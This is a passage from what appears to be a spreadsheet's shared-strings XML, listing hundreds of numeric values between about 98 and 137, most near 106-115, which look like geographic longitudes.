  </si>
  <si>
    <t>114.58294</t>
  </si>
  <si>
    <t>114.91073</t>
  </si>
  <si>
    <t>114.60831</t>
  </si>
  <si>
    <t>115.09386</t>
  </si>
  <si>
    <t>114.62173</t>
  </si>
  <si>
    <t>114.64806</t>
  </si>
  <si>
    <t>114.63398</t>
  </si>
  <si>
    <t>115.38144</t>
  </si>
  <si>
    <t>115.38535</t>
  </si>
  <si>
    <t>114.57308</t>
  </si>
  <si>
    <t>108.08147</t>
  </si>
  <si>
    <t>115.37007</t>
  </si>
  <si>
    <t>115.37020</t>
  </si>
  <si>
    <t>114.61586</t>
  </si>
  <si>
    <t>114.93566</t>
  </si>
  <si>
    <t>114.58912</t>
  </si>
  <si>
    <t>113.67917</t>
  </si>
  <si>
    <t>114.97467</t>
  </si>
  <si>
    <t>114.77587</t>
  </si>
  <si>
    <t>114.66854</t>
  </si>
  <si>
    <t>114.84067</t>
  </si>
  <si>
    <t>115.29476</t>
  </si>
  <si>
    <t>117.16964</t>
  </si>
  <si>
    <t>114.61020</t>
  </si>
  <si>
    <t>115.42067</t>
  </si>
  <si>
    <t>114.61485</t>
  </si>
  <si>
    <t>115.26562</t>
  </si>
  <si>
    <t>114.61049</t>
  </si>
  <si>
    <t>114.85401</t>
  </si>
  <si>
    <t>114.60645</t>
  </si>
  <si>
    <t>114.60437</t>
  </si>
  <si>
    <t>114.61257</t>
  </si>
  <si>
    <t>114.88242</t>
  </si>
  <si>
    <t>114.67893</t>
  </si>
  <si>
    <t>114.61684</t>
  </si>
  <si>
    <t>115.54561</t>
  </si>
  <si>
    <t>114.72896</t>
  </si>
  <si>
    <t>114.61606</t>
  </si>
  <si>
    <t>114.65231</t>
  </si>
  <si>
    <t>115.38419</t>
  </si>
  <si>
    <t>114.60994</t>
  </si>
  <si>
    <t>114.64233</t>
  </si>
  <si>
    <t>115.38883</t>
  </si>
  <si>
    <t>114.57897</t>
  </si>
  <si>
    <t>114.61731</t>
  </si>
  <si>
    <t>115.46873</t>
  </si>
  <si>
    <t>114.62597</t>
  </si>
  <si>
    <t>114.68280</t>
  </si>
  <si>
    <t>114.61135</t>
  </si>
  <si>
    <t>114.61948</t>
  </si>
  <si>
    <t>114.66829</t>
  </si>
  <si>
    <t>114.60743</t>
  </si>
  <si>
    <t>114.61456</t>
  </si>
  <si>
    <t>114.80085</t>
  </si>
  <si>
    <t>114.63276</t>
  </si>
  <si>
    <t>114.76730</t>
  </si>
  <si>
    <t>115.37731</t>
  </si>
  <si>
    <t>114.60622</t>
  </si>
  <si>
    <t>114.63162</t>
  </si>
  <si>
    <t>114.60944</t>
  </si>
  <si>
    <t>114.86735</t>
  </si>
  <si>
    <t>114.59998</t>
  </si>
  <si>
    <t>115.37099</t>
  </si>
  <si>
    <t>114.85260</t>
  </si>
  <si>
    <t>115.54504</t>
  </si>
  <si>
    <t>115.10374</t>
  </si>
  <si>
    <t>120.18342</t>
  </si>
  <si>
    <t>115.38425</t>
  </si>
  <si>
    <t>114.59219</t>
  </si>
  <si>
    <t>115.38405</t>
  </si>
  <si>
    <t>115.38254</t>
  </si>
  <si>
    <t>114.87050</t>
  </si>
  <si>
    <t>114.62634</t>
  </si>
  <si>
    <t>114.64319</t>
  </si>
  <si>
    <t>114.83377</t>
  </si>
  <si>
    <t>114.67006</t>
  </si>
  <si>
    <t>114.66820</t>
  </si>
  <si>
    <t>114.62719</t>
  </si>
  <si>
    <t>114.87093</t>
  </si>
  <si>
    <t>114.84553</t>
  </si>
  <si>
    <t>115.60993</t>
  </si>
  <si>
    <t>114.86148</t>
  </si>
  <si>
    <t>115.53168</t>
  </si>
  <si>
    <t>115.37334</t>
  </si>
  <si>
    <t>114.61620</t>
  </si>
  <si>
    <t>114.61105</t>
  </si>
  <si>
    <t>114.85210</t>
  </si>
  <si>
    <t>114.61429</t>
  </si>
  <si>
    <t>114.85336</t>
  </si>
  <si>
    <t>115.38177</t>
  </si>
  <si>
    <t>115.23637</t>
  </si>
  <si>
    <t>114.62323</t>
  </si>
  <si>
    <t>114.66265</t>
  </si>
  <si>
    <t>114.57882</t>
  </si>
  <si>
    <t>114.84781</t>
  </si>
  <si>
    <t>115.45303</t>
  </si>
  <si>
    <t>114.85356</t>
  </si>
  <si>
    <t>115.38452</t>
  </si>
  <si>
    <t>115.43936</t>
  </si>
  <si>
    <t>114.63863</t>
  </si>
  <si>
    <t>114.66323</t>
  </si>
  <si>
    <t>109.95464</t>
  </si>
  <si>
    <t>107.61629</t>
  </si>
  <si>
    <t>109.65978</t>
  </si>
  <si>
    <t>124.84769</t>
  </si>
  <si>
    <t>114.62141</t>
  </si>
  <si>
    <t>114.61703</t>
  </si>
  <si>
    <t>107.61635</t>
  </si>
  <si>
    <t>114.85381</t>
  </si>
  <si>
    <t>114.60858</t>
  </si>
  <si>
    <t>106.66581</t>
  </si>
  <si>
    <t>114.61873</t>
  </si>
  <si>
    <t>114.60238</t>
  </si>
  <si>
    <t>114.60515</t>
  </si>
  <si>
    <t>115.38597</t>
  </si>
  <si>
    <t>112.34611</t>
  </si>
  <si>
    <t>114.86467</t>
  </si>
  <si>
    <t>109.83547</t>
  </si>
  <si>
    <t>114.61562</t>
  </si>
  <si>
    <t>106.83003</t>
  </si>
  <si>
    <t>118.90704</t>
  </si>
  <si>
    <t>112.63147</t>
  </si>
  <si>
    <t>109.68087</t>
  </si>
  <si>
    <t>112.01335</t>
  </si>
  <si>
    <t>112.00553</t>
  </si>
  <si>
    <t>106.73377</t>
  </si>
  <si>
    <t>115.36985</t>
  </si>
  <si>
    <t>112.64466</t>
  </si>
  <si>
    <t>112.00982</t>
  </si>
  <si>
    <t>114.61059</t>
  </si>
  <si>
    <t>106.79894</t>
  </si>
  <si>
    <t>114.66096</t>
  </si>
  <si>
    <t>112.65928</t>
  </si>
  <si>
    <t>112.38052</t>
  </si>
  <si>
    <t>114.64008</t>
  </si>
  <si>
    <t>116.24199</t>
  </si>
  <si>
    <t>114.63584</t>
  </si>
  <si>
    <t>109.46997</t>
  </si>
  <si>
    <t>109.46998</t>
  </si>
  <si>
    <t>136.37667</t>
  </si>
  <si>
    <t>106.87224</t>
  </si>
  <si>
    <t>114.69646</t>
  </si>
  <si>
    <t>112.66657</t>
  </si>
  <si>
    <t>112.66630</t>
  </si>
  <si>
    <t>112.66621</t>
  </si>
  <si>
    <t>114.62951</t>
  </si>
  <si>
    <t>112.00768</t>
  </si>
  <si>
    <t>107.61203</t>
  </si>
  <si>
    <t>107.64971</t>
  </si>
  <si>
    <t>136.37668</t>
  </si>
  <si>
    <t>106.97183</t>
  </si>
  <si>
    <t>124.85818</t>
  </si>
  <si>
    <t>124.83586</t>
  </si>
  <si>
    <t>106.70254</t>
  </si>
  <si>
    <t>106.70257</t>
  </si>
  <si>
    <t>118.86324</t>
  </si>
  <si>
    <t>106.82956</t>
  </si>
  <si>
    <t>112.03628</t>
  </si>
  <si>
    <t>109.64776</t>
  </si>
  <si>
    <t>105.62275</t>
  </si>
  <si>
    <t>106.94785</t>
  </si>
  <si>
    <t>106.95670</t>
  </si>
  <si>
    <t>106.93161</t>
  </si>
  <si>
    <t>107.74864</t>
  </si>
  <si>
    <t>106.77396</t>
  </si>
  <si>
    <t>107.11789</t>
  </si>
  <si>
    <t>110.44888</t>
  </si>
  <si>
    <t>110.46755</t>
  </si>
  <si>
    <t>106.56874</t>
  </si>
  <si>
    <t>110.47337</t>
  </si>
  <si>
    <t>110.04897</t>
  </si>
  <si>
    <t>106.72584</t>
  </si>
  <si>
    <t>112.10789</t>
  </si>
  <si>
    <t>106.90456</t>
  </si>
  <si>
    <t>113.70485</t>
  </si>
  <si>
    <t>112.00639</t>
  </si>
  <si>
    <t>106.82753</t>
  </si>
  <si>
    <t>112.51933</t>
  </si>
  <si>
    <t>114.26194</t>
  </si>
  <si>
    <t>106.69434</t>
  </si>
  <si>
    <t>106.69439</t>
  </si>
  <si>
    <t>106.69442</t>
  </si>
  <si>
    <t>106.82762</t>
  </si>
  <si>
    <t>110.92098</t>
  </si>
  <si>
    <t>108.65063</t>
  </si>
  <si>
    <t>106.79778</t>
  </si>
  <si>
    <t>106.79571</t>
  </si>
  <si>
    <t>115.37009</t>
  </si>
  <si>
    <t>112.00888</t>
  </si>
  <si>
    <t>99.38122</t>
  </si>
  <si>
    <t>106.79557</t>
  </si>
  <si>
    <t>106.79543</t>
  </si>
  <si>
    <t>106.79573</t>
  </si>
  <si>
    <t>112.00746</t>
  </si>
  <si>
    <t>106.79537</t>
  </si>
  <si>
    <t>106.79523</t>
  </si>
  <si>
    <t>107.01938</t>
  </si>
  <si>
    <t>112.30218</t>
  </si>
  <si>
    <t>106.94096</t>
  </si>
  <si>
    <t>106.94076</t>
  </si>
  <si>
    <t>106.77435</t>
  </si>
  <si>
    <t>106.17295</t>
  </si>
  <si>
    <t>106.77651</t>
  </si>
  <si>
    <t>106.83394</t>
  </si>
  <si>
    <t>106.91067</t>
  </si>
  <si>
    <t>106.91250</t>
  </si>
  <si>
    <t>107.08923</t>
  </si>
  <si>
    <t>107.18606</t>
  </si>
  <si>
    <t>115.12386</t>
  </si>
  <si>
    <t>112.68528</t>
  </si>
  <si>
    <t>106.93260</t>
  </si>
  <si>
    <t>110.78718</t>
  </si>
  <si>
    <t>112.21573</t>
  </si>
  <si>
    <t>110.45195</t>
  </si>
  <si>
    <t>106.70894</t>
  </si>
  <si>
    <t>106.75873</t>
  </si>
  <si>
    <t>107.01151</t>
  </si>
  <si>
    <t>110.46663</t>
  </si>
  <si>
    <t>110.43241</t>
  </si>
  <si>
    <t>110.46255</t>
  </si>
  <si>
    <t>110.42304</t>
  </si>
  <si>
    <t>110.23372</t>
  </si>
  <si>
    <t>110.46896</t>
  </si>
  <si>
    <t>110.40587</t>
  </si>
  <si>
    <t>112.00665</t>
  </si>
  <si>
    <t>112.00493</t>
  </si>
  <si>
    <t>112.00840</t>
  </si>
  <si>
    <t>111.55963</t>
  </si>
  <si>
    <t>112.00692</t>
  </si>
  <si>
    <t>110.44762</t>
  </si>
  <si>
    <t>110.53847</t>
  </si>
  <si>
    <t>110.45729</t>
  </si>
  <si>
    <t>112.11499</t>
  </si>
  <si>
    <t>110.54575</t>
  </si>
  <si>
    <t>110.46511</t>
  </si>
  <si>
    <t>110.48060</t>
  </si>
  <si>
    <t>110.40275</t>
  </si>
  <si>
    <t>110.48259</t>
  </si>
  <si>
    <t>110.46375</t>
  </si>
  <si>
    <t>110.41924</t>
  </si>
  <si>
    <t>110.45347</t>
  </si>
  <si>
    <t>106.72679</t>
  </si>
  <si>
    <t>110.42952</t>
  </si>
  <si>
    <t>109.64637</t>
  </si>
  <si>
    <t>106.91909</t>
  </si>
  <si>
    <t>106.87289</t>
  </si>
  <si>
    <t>106.83812</t>
  </si>
  <si>
    <t>106.95392</t>
  </si>
  <si>
    <t>106.99132</t>
  </si>
  <si>
    <t>106.91058</t>
  </si>
  <si>
    <t>106.77048</t>
  </si>
  <si>
    <t>106.77647</t>
  </si>
  <si>
    <t>106.78595</t>
  </si>
  <si>
    <t>106.78623</t>
  </si>
  <si>
    <t>106.77080</t>
  </si>
  <si>
    <t>106.70787</t>
  </si>
  <si>
    <t>110.46178</t>
  </si>
  <si>
    <t>106.73096</t>
  </si>
  <si>
    <t>106.76309</t>
  </si>
  <si>
    <t>106.76962</t>
  </si>
  <si>
    <t>106.86590</t>
  </si>
  <si>
    <t>110.45380</t>
  </si>
  <si>
    <t>106.91531</t>
  </si>
  <si>
    <t>106.92783</t>
  </si>
  <si>
    <t>111.95729</t>
  </si>
  <si>
    <t>110.41210</t>
  </si>
  <si>
    <t>106.78642</t>
  </si>
  <si>
    <t>109.67704</t>
  </si>
  <si>
    <t>107.63240</t>
  </si>
  <si>
    <t>106.92720</t>
  </si>
  <si>
    <t>115.21984</t>
  </si>
  <si>
    <t>106.77081</t>
  </si>
  <si>
    <t>107.43314</t>
  </si>
  <si>
    <t>110.44875</t>
  </si>
  <si>
    <t>108.15898</t>
  </si>
  <si>
    <t>107.90362</t>
  </si>
  <si>
    <t>106.83351</t>
  </si>
  <si>
    <t>106.83321</t>
  </si>
  <si>
    <t>106.83421</t>
  </si>
  <si>
    <t>106.78625</t>
  </si>
  <si>
    <t>107.21386</t>
  </si>
  <si>
    <t>106.86355</t>
  </si>
  <si>
    <t>107.93588</t>
  </si>
  <si>
    <t>106.86282</t>
  </si>
  <si>
    <t>110.44897</t>
  </si>
  <si>
    <t>108.24504</t>
  </si>
  <si>
    <t>106.89918</t>
  </si>
  <si>
    <t>106.86603</t>
  </si>
  <si>
    <t>106.86271</t>
  </si>
  <si>
    <t>107.69912</t>
  </si>
  <si>
    <t>107.47077</t>
  </si>
  <si>
    <t>108.16106</t>
  </si>
  <si>
    <t>107.59877</t>
  </si>
  <si>
    <t>106.81569</t>
  </si>
  <si>
    <t>107.00866</t>
  </si>
  <si>
    <t>106.77087</t>
  </si>
  <si>
    <t>108.14893</t>
  </si>
  <si>
    <t>110.44857</t>
  </si>
  <si>
    <t>107.04512</t>
  </si>
  <si>
    <t>110.44756</t>
  </si>
  <si>
    <t>107.03806</t>
  </si>
  <si>
    <t>108.04228</t>
  </si>
  <si>
    <t>108.34173</t>
  </si>
  <si>
    <t>110.46086</t>
  </si>
  <si>
    <t>106.73319</t>
  </si>
  <si>
    <t>106.86596</t>
  </si>
  <si>
    <t>106.86010</t>
  </si>
  <si>
    <t>106.86652</t>
  </si>
  <si>
    <t>106.85699</t>
  </si>
  <si>
    <t>107.28817</t>
  </si>
  <si>
    <t>106.85990</t>
  </si>
  <si>
    <t>107.04150</t>
  </si>
  <si>
    <t>106.87451</t>
  </si>
  <si>
    <t>106.71561</t>
  </si>
  <si>
    <t>107.27304</t>
  </si>
  <si>
    <t>108.32491</t>
  </si>
  <si>
    <t>107.82101</t>
  </si>
  <si>
    <t>106.83289</t>
  </si>
  <si>
    <t>106.83280</t>
  </si>
  <si>
    <t>106.77092</t>
  </si>
  <si>
    <t>106.99465</t>
  </si>
  <si>
    <t>107.80429</t>
  </si>
  <si>
    <t>106.77026</t>
  </si>
  <si>
    <t>106.77083</t>
  </si>
  <si>
    <t>106.85102</t>
  </si>
  <si>
    <t>106.85704</t>
  </si>
  <si>
    <t>106.77078</t>
  </si>
  <si>
    <t>108.32737</t>
  </si>
  <si>
    <t>106.86187</t>
  </si>
  <si>
    <t>112.23302</t>
  </si>
  <si>
    <t>110.20002</t>
  </si>
  <si>
    <t>109.66486</t>
  </si>
  <si>
    <t>107.05573</t>
  </si>
  <si>
    <t>114.82868</t>
  </si>
  <si>
    <t>119.50863</t>
  </si>
  <si>
    <t>124.85314</t>
  </si>
  <si>
    <t>105.21217</t>
  </si>
  <si>
    <t>114.05500</t>
  </si>
  <si>
    <t>114.63508</t>
  </si>
  <si>
    <t>113.70590</t>
  </si>
  <si>
    <t>111.48429</t>
  </si>
  <si>
    <t>107.41067</t>
  </si>
  <si>
    <t>112.14151</t>
  </si>
  <si>
    <t>124.85652</t>
  </si>
  <si>
    <t>110.45840</t>
  </si>
  <si>
    <t>110.81612</t>
  </si>
  <si>
    <t>98.60090</t>
  </si>
  <si>
    <t>107.27839</t>
  </si>
  <si>
    <t>110.81841</t>
  </si>
  <si>
    <t>107.23239</t>
  </si>
  <si>
    <t>107.25442</t>
  </si>
  <si>
    <t>107.82064</t>
  </si>
  <si>
    <t>112.12942</t>
  </si>
  <si>
    <t>107.81232</t>
  </si>
  <si>
    <t>106.85921</t>
  </si>
  <si>
    <t>110.47167</t>
  </si>
  <si>
    <t>104.75649</t>
  </si>
  <si>
    <t>107.46238</t>
  </si>
  <si>
    <t>109.95494</t>
  </si>
  <si>
    <t>109.68572</t>
  </si>
  <si>
    <t>113.70502</t>
  </si>
  <si>
    <t>109.63609</t>
  </si>
  <si>
    <t>104.75644</t>
  </si>
  <si>
    <t>106.78589</t>
  </si>
  <si>
    <t>113.70525</t>
  </si>
  <si>
    <t>110.82156</t>
  </si>
  <si>
    <t>110.49697</t>
  </si>
  <si>
    <t>108.16685</t>
  </si>
  <si>
    <t>106.84745</t>
  </si>
  <si>
    <t>107.14382</t>
  </si>
  <si>
    <t>106.90542</t>
  </si>
  <si>
    <t>119.85013</t>
  </si>
  <si>
    <t>106.95055</t>
  </si>
  <si>
    <t>111.90820</t>
  </si>
  <si>
    <t>112.34699</t>
  </si>
  <si>
    <t>111.90406</t>
  </si>
  <si>
    <t>106.83281</t>
  </si>
  <si>
    <t>111.83626</t>
  </si>
  <si>
    <t>112.70908</t>
  </si>
  <si>
    <t>106.94719</t>
  </si>
  <si>
    <t>111.89957</t>
  </si>
  <si>
    <t>111.83690</t>
  </si>
  <si>
    <t>106.74693</t>
  </si>
  <si>
    <t>106.95786</t>
  </si>
  <si>
    <t>106.89924</t>
  </si>
  <si>
    <t>106.98609</t>
  </si>
  <si>
    <t>106.98010</t>
  </si>
  <si>
    <t>106.95920</t>
  </si>
  <si>
    <t>106.95921</t>
  </si>
  <si>
    <t>112.73442</t>
  </si>
  <si>
    <t>111.80341</t>
  </si>
  <si>
    <t>106.77084</t>
  </si>
  <si>
    <t>106.82186</t>
  </si>
  <si>
    <t>106.94150</t>
  </si>
  <si>
    <t>106.94005</t>
  </si>
  <si>
    <t>106.93947</t>
  </si>
  <si>
    <t>106.75906</t>
  </si>
  <si>
    <t>106.77420</t>
  </si>
  <si>
    <t>106.91070</t>
  </si>
  <si>
    <t>106.77419</t>
  </si>
  <si>
    <t>106.75620</t>
  </si>
  <si>
    <t>106.69457</t>
  </si>
  <si>
    <t>106.64422</t>
  </si>
  <si>
    <t>106.77159</t>
  </si>
  <si>
    <t>106.87703</t>
  </si>
  <si>
    <t>106.91231</t>
  </si>
  <si>
    <t>106.63073</t>
  </si>
  <si>
    <t>106.68828</t>
  </si>
  <si>
    <t>106.70685</t>
  </si>
  <si>
    <t>106.91335</t>
  </si>
  <si>
    <t>106.91339</t>
  </si>
  <si>
    <t>106.91341</t>
  </si>
  <si>
    <t>106.70517</t>
  </si>
  <si>
    <t>106.72026</t>
  </si>
  <si>
    <t>106.73793</t>
  </si>
  <si>
    <t>106.88823</t>
  </si>
  <si>
    <t>106.71681</t>
  </si>
  <si>
    <t>106.68824</t>
  </si>
  <si>
    <t>112.72297</t>
  </si>
  <si>
    <t>109.67096</t>
  </si>
  <si>
    <t>112.00762</t>
  </si>
  <si>
    <t>99.38061</t>
  </si>
  <si>
    <t>106.75042</t>
  </si>
  <si>
    <t>112.75988</t>
  </si>
  <si>
    <t>115.12323</t>
  </si>
  <si>
    <t>109.67733</t>
  </si>
  <si>
    <t>106.82230</t>
  </si>
  <si>
    <t>106.83627</t>
  </si>
  <si>
    <t>106.83696</t>
  </si>
  <si>
    <t>106.90332</t>
  </si>
  <si>
    <t>106.90331</t>
  </si>
  <si>
    <t>106.90330</t>
  </si>
  <si>
    <t>106.79026</t>
  </si>
  <si>
    <t>106.83015</t>
  </si>
  <si>
    <t>106.90767</t>
  </si>
  <si>
    <t>106.81724</t>
  </si>
  <si>
    <t>106.85848</t>
  </si>
  <si>
    <t>106.81778</t>
  </si>
  <si>
    <t>106.81715</t>
  </si>
  <si>
    <t>106.92666</t>
  </si>
  <si>
    <t>109.67095</t>
  </si>
  <si>
    <t>106.90326</t>
  </si>
  <si>
    <t>106.93285</t>
  </si>
  <si>
    <t>106.90320</t>
  </si>
  <si>
    <t>106.94063</t>
  </si>
  <si>
    <t>106.93987</t>
  </si>
  <si>
    <t>106.92767</t>
  </si>
  <si>
    <t>106.93613</t>
  </si>
  <si>
    <t>106.95336</t>
  </si>
  <si>
    <t>106.92216</t>
  </si>
  <si>
    <t>106.93098</t>
  </si>
  <si>
    <t>106.87443</t>
  </si>
  <si>
    <t>106.92059</t>
  </si>
  <si>
    <t>106.93145</t>
  </si>
  <si>
    <t>106.87405</t>
  </si>
  <si>
    <t>106.90324</t>
  </si>
  <si>
    <t>106.95342</t>
  </si>
  <si>
    <t>106.90427</t>
  </si>
  <si>
    <t>106.94848</t>
  </si>
  <si>
    <t>106.95314</t>
  </si>
  <si>
    <t>106.88018</t>
  </si>
  <si>
    <t>106.93370</t>
  </si>
  <si>
    <t>106.89436</t>
  </si>
  <si>
    <t>106.81765</t>
  </si>
  <si>
    <t>106.94824</t>
  </si>
  <si>
    <t>106.89615</t>
  </si>
  <si>
    <t>106.96579</t>
  </si>
  <si>
    <t>106.94046</t>
  </si>
  <si>
    <t>106.92787</t>
  </si>
  <si>
    <t>106.90213</t>
  </si>
  <si>
    <t>106.88123</t>
  </si>
  <si>
    <t>106.82066</t>
  </si>
  <si>
    <t>106.89217</t>
  </si>
  <si>
    <t>106.91148</t>
  </si>
  <si>
    <t>107.00181</t>
  </si>
  <si>
    <t>107.02212</t>
  </si>
  <si>
    <t>107.05233</t>
  </si>
  <si>
    <t>106.82979</t>
  </si>
  <si>
    <t>122.29004</t>
  </si>
  <si>
    <t>107.06240</t>
  </si>
  <si>
    <t>106.96386</t>
  </si>
  <si>
    <t>106.87912</t>
  </si>
  <si>
    <t>106.97061</t>
  </si>
  <si>
    <t>106.92860</t>
  </si>
  <si>
    <t>106.83936</t>
  </si>
  <si>
    <t>106.82752</t>
  </si>
  <si>
    <t>106.82054</t>
  </si>
  <si>
    <t>106.87516</t>
  </si>
  <si>
    <t>106.68481</t>
  </si>
  <si>
    <t>106.82100</t>
  </si>
  <si>
    <t>106.78348</t>
  </si>
  <si>
    <t>106.90215</t>
  </si>
  <si>
    <t>106.80313</t>
  </si>
  <si>
    <t>106.79301</t>
  </si>
  <si>
    <t>106.68525</t>
  </si>
  <si>
    <t>106.92174</t>
  </si>
  <si>
    <t>106.70900</t>
  </si>
  <si>
    <t>106.82064</t>
  </si>
  <si>
    <t>106.81570</t>
  </si>
  <si>
    <t>106.81887</t>
  </si>
  <si>
    <t>106.81631</t>
  </si>
  <si>
    <t>106.82160</t>
  </si>
  <si>
    <t>106.75971</t>
  </si>
  <si>
    <t>106.82795</t>
  </si>
  <si>
    <t>106.81574</t>
  </si>
  <si>
    <t>106.82506</t>
  </si>
  <si>
    <t>106.82086</t>
  </si>
  <si>
    <t>107.00705</t>
  </si>
  <si>
    <t>106.82166</t>
  </si>
  <si>
    <t>106.93090</t>
  </si>
  <si>
    <t>106.98848</t>
  </si>
  <si>
    <t>106.88145</t>
  </si>
  <si>
    <t>106.82851</t>
  </si>
  <si>
    <t>106.87051</t>
  </si>
  <si>
    <t>106.57719</t>
  </si>
  <si>
    <t>106.86817</t>
  </si>
  <si>
    <t>107.02690</t>
  </si>
  <si>
    <t>106.88125</t>
  </si>
  <si>
    <t>106.59479</t>
  </si>
  <si>
    <t>106.83646</t>
  </si>
  <si>
    <t>106.83573</t>
  </si>
  <si>
    <t>106.77099</t>
  </si>
  <si>
    <t>106.95675</t>
  </si>
  <si>
    <t>106.75902</t>
  </si>
  <si>
    <t>106.87449</t>
  </si>
  <si>
    <t>106.76567</t>
  </si>
  <si>
    <t>106.83334</t>
  </si>
  <si>
    <t>106.77406</t>
  </si>
  <si>
    <t>106.85787</t>
  </si>
  <si>
    <t>106.82950</t>
  </si>
  <si>
    <t>106.67907</t>
  </si>
  <si>
    <t>106.67618</t>
  </si>
  <si>
    <t>106.81585</t>
  </si>
  <si>
    <t>106.81004</t>
  </si>
  <si>
    <t>106.75922</t>
  </si>
  <si>
    <t>106.81642</t>
  </si>
  <si>
    <t>106.79261</t>
  </si>
  <si>
    <t>106.93566</t>
  </si>
  <si>
    <t>106.83022</t>
  </si>
  <si>
    <t>106.69218</t>
  </si>
  <si>
    <t>106.82790</t>
  </si>
  <si>
    <t>106.93970</t>
  </si>
  <si>
    <t>107.11149</t>
  </si>
  <si>
    <t>106.87056</t>
  </si>
  <si>
    <t>106.69248</t>
  </si>
  <si>
    <t>106.82255</t>
  </si>
  <si>
    <t>106.80998</t>
  </si>
  <si>
    <t>106.88019</t>
  </si>
  <si>
    <t>106.90059</t>
  </si>
  <si>
    <t>106.59441</t>
  </si>
  <si>
    <t>106.87219</t>
  </si>
  <si>
    <t>106.81644</t>
  </si>
  <si>
    <t>106.77695</t>
  </si>
  <si>
    <t>106.69336</t>
  </si>
  <si>
    <t>107.08415</t>
  </si>
  <si>
    <t>106.72559</t>
  </si>
  <si>
    <t>106.66998</t>
  </si>
  <si>
    <t>106.87750</t>
  </si>
  <si>
    <t>106.75120</t>
  </si>
  <si>
    <t>106.69317</t>
  </si>
  <si>
    <t>106.82609</t>
  </si>
  <si>
    <t>106.86439</t>
  </si>
  <si>
    <t>106.83486</t>
  </si>
  <si>
    <t>106.94863</t>
  </si>
  <si>
    <t>106.82532</t>
  </si>
  <si>
    <t>107.00512</t>
  </si>
  <si>
    <t>106.89248</t>
  </si>
  <si>
    <t>106.82780</t>
  </si>
  <si>
    <t>107.15330</t>
  </si>
  <si>
    <t>106.82225</t>
  </si>
  <si>
    <t>106.82781</t>
  </si>
  <si>
    <t>106.82080</t>
  </si>
  <si>
    <t>106.93794</t>
  </si>
  <si>
    <t>106.83406</t>
  </si>
  <si>
    <t>106.87099</t>
  </si>
  <si>
    <t>106.83405</t>
  </si>
  <si>
    <t>106.87942</t>
  </si>
  <si>
    <t>106.82563</t>
  </si>
  <si>
    <t>106.82880</t>
  </si>
  <si>
    <t>106.95870</t>
  </si>
  <si>
    <t>106.81767</t>
  </si>
  <si>
    <t>106.81756</t>
  </si>
  <si>
    <t>106.96751</t>
  </si>
  <si>
    <t>106.69263</t>
  </si>
  <si>
    <t>106.88197</t>
  </si>
  <si>
    <t>106.86657</t>
  </si>
  <si>
    <t>106.57988</t>
  </si>
  <si>
    <t>106.68928</t>
  </si>
  <si>
    <t>106.76661</t>
  </si>
  <si>
    <t>109.66604</t>
  </si>
  <si>
    <t>106.82248</t>
  </si>
  <si>
    <t>107.16355</t>
  </si>
  <si>
    <t>106.69195</t>
  </si>
  <si>
    <t>106.88066</t>
  </si>
  <si>
    <t>106.95799</t>
  </si>
  <si>
    <t>107.16413</t>
  </si>
  <si>
    <t>106.92193</t>
  </si>
  <si>
    <t>110.44570</t>
  </si>
  <si>
    <t>107.16913</t>
  </si>
  <si>
    <t>106.77557</t>
  </si>
  <si>
    <t>106.77137</t>
  </si>
  <si>
    <t>106.59974</t>
  </si>
  <si>
    <t>106.77507</t>
  </si>
  <si>
    <t>106.72534</t>
  </si>
  <si>
    <t>106.82258</t>
  </si>
  <si>
    <t>107.16766</t>
  </si>
  <si>
    <t>106.73074</t>
  </si>
  <si>
    <t>106.73088</t>
  </si>
  <si>
    <t>106.80816</t>
  </si>
  <si>
    <t>106.75896</t>
  </si>
  <si>
    <t>106.75274</t>
  </si>
  <si>
    <t>106.88028</t>
  </si>
  <si>
    <t>106.86533</t>
  </si>
  <si>
    <t>106.72783</t>
  </si>
  <si>
    <t>106.82282</t>
  </si>
  <si>
    <t>106.72350</t>
  </si>
  <si>
    <t>106.81013</t>
  </si>
  <si>
    <t>106.72066</t>
  </si>
  <si>
    <t>106.85773</t>
  </si>
  <si>
    <t>107.01929</t>
  </si>
  <si>
    <t>106.86995</t>
  </si>
  <si>
    <t>106.77335</t>
  </si>
  <si>
    <t>106.81227</t>
  </si>
  <si>
    <t>107.04134</t>
  </si>
  <si>
    <t>106.96276</t>
  </si>
  <si>
    <t>106.95260</t>
  </si>
  <si>
    <t>106.85808</t>
  </si>
  <si>
    <t>106.81481</t>
  </si>
  <si>
    <t>106.72865</t>
  </si>
  <si>
    <t>106.81953</t>
  </si>
  <si>
    <t>106.72882</t>
  </si>
  <si>
    <t>107.17400</t>
  </si>
  <si>
    <t>106.83487</t>
  </si>
  <si>
    <t>106.71581</t>
  </si>
  <si>
    <t>107.28472</t>
  </si>
  <si>
    <t>106.72092</t>
  </si>
  <si>
    <t>106.88221</t>
  </si>
  <si>
    <t>106.81372</t>
  </si>
  <si>
    <t>106.93774</t>
  </si>
  <si>
    <t>106.86837</t>
  </si>
  <si>
    <t>106.86839</t>
  </si>
  <si>
    <t>107.18760</t>
  </si>
  <si>
    <t>106.74670</t>
  </si>
  <si>
    <t>106.87435</t>
  </si>
  <si>
    <t>106.75900</t>
  </si>
  <si>
    <t>106.94014</t>
  </si>
  <si>
    <t>106.93971</t>
  </si>
  <si>
    <t>107.13861</t>
  </si>
  <si>
    <t>106.87371</t>
  </si>
  <si>
    <t>106.83599</t>
  </si>
  <si>
    <t>106.75777</t>
  </si>
  <si>
    <t>106.68762</t>
  </si>
  <si>
    <t>106.82702</t>
  </si>
  <si>
    <t>106.76767</t>
  </si>
  <si>
    <t>106.87603</t>
  </si>
  <si>
    <t>106.76306</t>
  </si>
  <si>
    <t>109.61973</t>
  </si>
  <si>
    <t>106.79079</t>
  </si>
  <si>
    <t>106.69777</t>
  </si>
  <si>
    <t>106.82179</t>
  </si>
  <si>
    <t>106.96976</t>
  </si>
  <si>
    <t>106.81277</t>
  </si>
  <si>
    <t>106.86206</t>
  </si>
  <si>
    <t>106.83391</t>
  </si>
  <si>
    <t>107.02597</t>
  </si>
  <si>
    <t>106.87758</t>
  </si>
  <si>
    <t>106.94818</t>
  </si>
  <si>
    <t>106.85875</t>
  </si>
  <si>
    <t>106.82965</t>
  </si>
  <si>
    <t>106.87782</t>
  </si>
  <si>
    <t>106.91476</t>
  </si>
  <si>
    <t>106.90200</t>
  </si>
  <si>
    <t>106.68916</t>
  </si>
  <si>
    <t>106.80921</t>
  </si>
  <si>
    <t>106.74373</t>
  </si>
  <si>
    <t>106.75765</t>
  </si>
  <si>
    <t>107.00781</t>
  </si>
  <si>
    <t>106.96860</t>
  </si>
  <si>
    <t>106.81375</t>
  </si>
  <si>
    <t>106.72030</t>
  </si>
  <si>
    <t>106.86060</t>
  </si>
  <si>
